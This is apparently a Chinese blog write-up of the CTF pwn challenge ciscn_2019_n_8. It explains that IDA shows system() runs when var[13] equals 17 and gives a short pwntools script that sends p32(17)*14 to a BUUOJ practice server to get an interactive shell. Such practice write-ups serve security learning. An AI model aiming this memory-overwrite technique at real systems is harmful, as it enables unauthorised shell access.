ciscn_2019_n_8

原创已于 2022-07-22 22:18:02 修改 · 426 阅读

CC 4.0 BY-SA版权

文章标签：

于 2022-07-22 21:39:54 首次发布

13 篇文章

订阅专栏

本文介绍了如何通过IDA反编译工具分析32位程序，该程序启用了Canary保护。作者在主函数中发现了系统调用的线索，特别是当变量值为17时会触发`system`函数。因此，通过填充17来尝试执行特定行为。最终，使用Python的`pwn`库发送数据到远程服务器并进入交互模式。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、查看文件

在这里插入图片描述

32位，开启了Canary保护。

啥也不清楚，就老办法，拖入IDA进行反编译：
在这里插入图片描述
感觉主函数中给的线索比较清晰，系统调用函数就在主函数中，看带代码是当var[13]==17LL时候执行system函数。

所以我们可以把17填充进去

from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",25456)
p=p32(17)*14
r.sendline(p)
r.interactive()

在这里插入图片描述